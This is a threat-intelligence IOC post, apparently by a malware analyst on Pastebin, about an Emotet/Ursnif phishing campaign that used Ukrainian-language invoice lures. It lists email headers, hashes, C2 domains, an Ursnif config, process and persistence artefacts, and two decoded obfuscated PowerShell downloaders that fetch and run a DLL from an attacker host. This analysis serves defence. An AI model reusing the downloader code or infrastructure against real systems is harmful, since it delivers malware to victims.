Advertisement
VRad

#emotet_ursnif_171019

Oct 18th, 2019
1,158
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.05 KB | None | 0 0
  1. #IOC #OptiData #VR #emotet_doc #ursnif_payload #W97M #PowerShell #ENC #inject
  2.  
  3. https://pastebin.com/1XfkVE5e
  4.  
  5. previous_contact: n/a
  6.  
  7. FAQ: https://radetskiy.wordpress.com/2018/04/03/ioc_ursnif_020418/
  8.  
  9. attack_vector
  10. --------------
  11. email attach .DOC > macro > b64 > powershell > GET bin > %user%\*.bin > %user%\appdata\roaming\microsoft\audizfwk\adsnwave.dll
  12.  
  13. email_headers
  14. --------------
  15. #1
  16. Return-Path: <[email protected]>
  17. Received: from gateway36.websitewelcome.com (gateway36.websitewelcome.com [192.185.201.2])
  18. Received: from cm14.websitewelcome.com (cm14.websitewelcome.com [100.42.49.7])
  19. Received: from box5254.bluehost.com ([162.241.225.96])
  20. Received: from [89.253.149.192] (port=53724 helo=5.61.57.146)
  21. Subject: терміново
  22. Date: Thu, 17 Oct 2019 16:35:57 +0300
  23. X-Source-IP: 89.253.149.192
  24. X-Source-Sender: (5.61.57.146) [89.253.149.192]:53724
  25. X-Source-Auth: [email protected]
  26.  
  27. #2
  28. Return-Path: <[email protected]>
  29. Received: from gateway22.websitewelcome.com (gateway22.websitewelcome.com [192.185.46.142])
  30. Received: from cm16.websitewelcome.com (cm16.websitewelcome.com [100.42.49.19])
  31. Received: from box5254.bluehost.com ([162.241.225.96])
  32. Received: from [178.75.241.39] (port=9647 helo=5.61.57.146)
  33. Date: Thu, 17 Oct 2019 16:35:57 +0300
  34. Subject: Рахунок-Фактура №340
  35. X-Source-IP: 178.75.241.39
  36. X-Source-Sender: (5.61.57.146) [178.75.241.39]:9647
  37. X-Source-Auth: [email protected]
  38.  
  39. #3
  40. Return-Path: <[email protected]>
  41. Received: from gproxy6-pub.mail.unifiedlayer.com (outbound-ss-348.hostmonster.com [74.220.202.212])
  42. Received: from cmgw15.unifiedlayer.com (unknown [10.9.0.15])
  43. Received: from box787.bluehost.com ([66.147.244.87])
  44. Received: from [62.176.68.133] (port=61085 helo=5.61.57.146)
  45. Date: Thu, 17 Oct 2019 16:22:40 +0300
  46. Subject: Рахунок за Газ №9282
  47. X-Source-IP: 62.176.68.133
  48. X-Source-Sender: (5.61.57.146) [62.176.68.133]:61085
  49. X-Source-Auth: [email protected]
  50.  
  51. files
  52. --------------
  53. SHA-256 f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287
  54. File name rahunok#0027980.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
  55. File size 285 KB (291840 bytes)
  56.  
  57. SHA-256 3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087
  58. File name rahunok#0037239.doc [CDF V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal, Revision Number: 1, Name of Creating Application: Microsoft Office Word]
  59. File size 329.5 KB (337408 bytes)
  60.  
  61. SHA-256 e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b
  62. File name hfsjaoipqewfbwoei.bin (point.dll) [PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit]
  63. File size 1.1 MB (1150976 bytes)
  64.  
  65. activity
  66. **************
  67. PL_SCR 161.117.39.210 limitsno{.} at/hfsjaoipqewfbwoei.bin
  68.  
  69. C2 47.74.186.51 vip-statistic{.} at
  70.  
  71. + @bomccss
  72. #ursnif config
  73. serpent_key: Dfei8OoQ0xhjTyql
  74. botnet-id: 700
  75. version: 217027
  76.  
  77. c2:
  78. cxzko43pnr7ujnte[.]onion
  79. vip-statistic[.]at
  80. intrade-support[.]at
  81. fresh-girls[.]at
  82.  
  83.  
  84. netwrk
  85. --------------
  86. [ssl]
  87. 216.58.201.78 google.com Client Hello
  88.  
  89. [http]
  90. 47.74.186.51 limitsno{.} at GET /hfsjaoipqewfbwoei.bin HTTP/1.1 noUA
  91. 47.74.186.51 vip-statistic{.} at GET /images/NFVfNmnFntzllAW_2/..../P1.gif HTTP/1.1 Mozilla/4.0
  92. 47.74.186.51 vip-statistic{.} at POST /images/ZP9eBpRUFTo1VIxz/.../C.bmp HTTP/1.1 Mozilla/4.0
  93.  
  94. comp
  95. --------------
  96. powershell.exe 2832 TCP localhost 49168 47.74.186.51 80 ESTABLISHED
  97. explorer.exe 1988 TCP localhost 49169 216.58.201.78 443 ESTABLISHED
  98. explorer.exe 1988 TCP localhost 49170 216.58.201.68 443 ESTABLISHED
  99. explorer.exe 1988 TCP localhost 49171 47.74.186.51 80 ESTABLISHED
  100. explorer.exe 1988 TCP localhost 49172 5.61.57.146 80 ESTABLISHED
  101.  
  102. proc
  103. --------------
  104. "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
  105. "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enco (base64)
  106. "C:\Windows\system32\regsvr32.exe" /s C:\Users\operator\nKUXcZ.bin
  107. C:\Windows\system32\control.exe /?
  108. "C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL /?
  109.  
  110. C:\Windows\system32\cmd.exe
  111. cmd.exe /C "nslookup myip.opendns.com resolver1.opendns.com > C:\tmp\415B.bi1"
  112. cmd /C "echo -------- >> C:\tmp\415B.bi1"
  113. "C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
  114.  
  115. cmd /C "systeminfo.exe > C:\tmp\A13.bin1"
  116. C:\Windows\system32\systeminfo.exe
  117.  
  118. cmd /C "net view >> C:\tmp\A13.bin1"
  119. C:\Windows\system32\net.exe net view
  120.  
  121. cmd /C "nslookup 127.0.0.1 >> C:\tmp\A13.bin1"
  122. cmd /C "tasklist.exe /SVC >> C:\tmp\A13.bin1"
  123.  
  124. cmd /C "driverquery.exe >> C:\tmp\A13.bin1"
  125. cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\tmp\A13.bin1"
  126.  
  127. persist
  128. --------------
  129. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2019 14:07
  130.  
  131. crypssec Free Age SportsSignup Meat
  132. c:\users\operator\appdata\roaming\microsoft\audizfwk\adsnwave.dll 06.10.2019 13:51
  133.  
  134. @rundll32 "C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll",DllRegisterServer
  135.  
  136. drop
  137. --------------
  138. C:\Users\operator\nKUXcZ.bin
  139. C:\Users\operator\AppData\Roaming\Microsoft\AudizFwk\adsnwave.dll
  140. C:\tmp\A13.bin1 - zip _ extracted info !!!
  141. C:\tmp\415B.bi1 - zip _ extracted info !!!
  142. C:\tmp\D5D9.bin - zip _ extracted info !!!
  143. C:\tmp\422B.bin - zip _ extracted info !!!
  144. C:\tmp\2BF9.bin - zip _ extracted info !!!
  145. C:\tmp\4DC3.bin - zip _ extracted info !!!
  146. C:\tmp\3083.bin - zip _ extracted info !!!
  147.  
  148. decoded b642powershell
  149. --------------
  150. #1
  151. $yozninjdjc="wxvhw";
  152. $kjqpsfw = "nKUXcZ";
  153. $kyvisokdvpou="iisvbivwcdfv";
  154. $bduhtq=$env:userprofile+"\"+$kjqpsfw+".bin";
  155. $shofvhgo="hfaho";
  156. $rwwci=&("new-object") net.webclient;
  157. $mznbayyscbf="clmvzpwymfxtqyuuq";
  158. $mtfyqp="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
  159. $hxpdmkdtmrg="kclcrunb";
  160. Function dwnld{
  161. $ndrrgwesufj="bqdtsgtsy";
  162. try{
  163. $ubjlvybhksmvmqz="svebvywesqwpbtt";
  164. $rwwci."DownloadFile"($mtfyqp, $bduhtq);
  165. $nosvyxzfejquwqm="jaqaiyxlv";
  166. If ((.("Get-Item") $bduhtq)."length" -ge 200000) {
  167. $pnpeirog="kmcyuo";
  168. $ugvjgt = Start-Process -FilePath "regsvr32.exe" -Args "/s $bduhtq" -Wait -NoNewWindow -PassThru;
  169. $ksecir="jvnvnwurbfdxqygqf";
  170. } else {
  171. $mhmwvmqfuybxwur="drffczm";
  172. dwnld;
  173. $pemmvoigqmsza="jyeqziuppapb";
  174. }
  175. $cqhccbph="gvuz";
  176. }catch{
  177. $rcvwrhfjqqxxch="mqeezcoacfemgpkzkd";
  178. dwnld;
  179. $vwdggtfwd="ovjvyghtjfxrnktgt";
  180. }}dwnld;
  181. $zbadv="vccbbnzdpdyqgcv";
  182.  
  183. #2
  184. $zhsiziqtdjjsyfye="nxoyyqtocw";
  185. $mgvtio = "UJqEF";
  186. $ithgawkqu="wgpqgqgnhjruhliad";
  187. $yueeoa=$env:userprofile+"\"+$mgvtio+".bin";
  188. $izbblp="zlzhdcptbhaunoglez";
  189. $ngvqvqb=&("new-object") net.webclient;
  190. $kltkpujnqzfofb="dzygqluhywhhvtx";
  191. $nslldzj="http://limitsno{.} at/hfsjaoipqewfbwoei.bin";
  192. $rbntzlbqkulv="vvrfbdvtoo";
  193. Function dwnld{
  194. $lazaxcmudbef="wzgiffoctszol";
  195. try{
  196. $wrqkxxidhtjrrcq="bviazvtzbmwpoiz";
  197. $ngvqvqb."DownloadFile"($nslldzj, $yueeoa);
  198. $wurllwckcoaobk="cwnwbf";
  199. If ((.("Get-Item") $yueeoa)."length" -ge 200000) {
  200. $quyqejvsjujj="mzoffmbtc";
  201. $jdjpil = Start-Process -FilePath "regsvr32.exe" -Args "/s $yueeoa" -Wait -NoNewWindow -PassThru;
  202. $gzvivurflv="koherilwrbkvczpi";
  203. } else {
  204. $ypcmgzp="zkupghelnqeegzm";
  205. dwnld;
  206. $zgxifpixbe="bwoffieyelusq";
  207. }
  208. $jbialh="huodfndgmg";
  209. }catch{
  210. $yjkwithuhhapy="ilcdki";
  211. dwnld;
  212. $xlgnju="gpstdwckvbm";
  213. }}dwnld;
  214. $gxpfk="ehxqxmwggmw";
  215.  
  216.  
  217. # # #
  218. https://www.virustotal.com/gui/file/f044e77427aa73ac8242b0084c4184b3f156bb20980b23afa7c7a2cc8ae87287/details
  219. https://www.virustotal.com/gui/file/3bd1f4bfd092ae54b46d5b562f4ad0bcef83322745dd68bdf78ede3e58f6e087/details
  220. https://www.virustotal.com/gui/file/e2372222abafaf63e079bb5c10d7cb28788128beed12c4194f26922e16c3be3b/details
  221. https://analyze.intezer.com/#/analyses/4db134a6-ebba-4515-bb5e-1b6ef9ac81f1
  222.  
  223.  
  224. VR
  225.  
  226. @
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement